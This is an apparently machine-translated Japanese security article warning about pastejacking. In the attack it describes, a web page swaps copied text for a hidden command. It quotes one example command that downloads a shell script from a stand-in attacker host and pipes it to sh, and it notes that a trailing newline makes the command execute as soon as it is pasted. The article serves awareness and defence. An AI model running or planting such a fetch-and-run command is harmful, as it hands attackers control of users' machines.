確かに私たちはスピードがすべてであり、迅速な結果を得ることが重要である時代に生きています。しかし、実際に一瞬立ち止まってその結果について考える人はほとんどいません。
毎日、何百万人ものプログラマー、管理者、セキュリティ研究者が、WebページからPCのコンソールに直接コマンドをコピーして貼り付けるなどの簡単なタスクを実行しています。
多くの人はそれについて考えさえしませんが、特に機密データや貴重なデータを保存する場合、その結果は最初に考えるよりもはるかに深刻で危険です。
有名なセキュリティ専門家が時間をかけて、Webページからコンテンツをコピーして貼り付けた場合に実際に何が起こるかを共有しました。
コピーと貼り付けは、ハックを取得する簡単な方法です
Wizerセキュリティ教育プラットフォームの創設者であるGabrielFriedlanderは、Webページからコマンドをコピーして貼り付ける前に、よく考えさせられる図の表紙を外しました。
インターネットからのコンテンツのコピーと貼り付けは、最近では非常に一般的になり、誰もそれについて考えることさえありません。
ただし、Friedlanderは、一部のWebページは一見したところよりも騙されており、コピーしたと思うものは実際に行ったものとは大きく異なると警告しています。
そして最悪の場合、必要な知識やガイダンスがなければ、被害者はテキストを挿入した後にのみ自分の間違いに気づきます。その時点では手遅れになる可能性があります。
セキュリティアナリストはまた、ブログの読者向けに小さなクイズを作成しました。これにより、サイバー犯罪者への扉を開くことに抵抗があることを人々が本当に理解できるようになります。
コピーするコマンドが提供されていましたが、適切な真実は、テキストを貼り付けて、実際にセットアップに入力した内容を確認した場合にのみ明らかになります。
上のスクリーンショットに示されているコマンドをコピーした後、複製したと思っていたものとはかけ離れているため、貼り付けの結果に衝撃があります。
curl http://attacker-domain:8000/shell.sh | shクリップボードにあるまったく異なるコマンドとは別に、最後の改行(またはリターン)文字は、上記の例がLinuxターミナルに直接挿入されるとすぐに実行されることを意味します。
したがって、実際に何が起こっているのかを認識し、それを深刻なセキュリティの脅威として扱う方がよいでしょう。すべてのWebサイトが悪意のあるコンテンツを隠していると言っているわけではありませんが、それを考慮に入れる必要があります。
トリッキーなコマンドを端末に挿入してハッキングされたことはありますか?以下のコメントセクションで私たちとあなたの経験を共有してください。
コメントを残す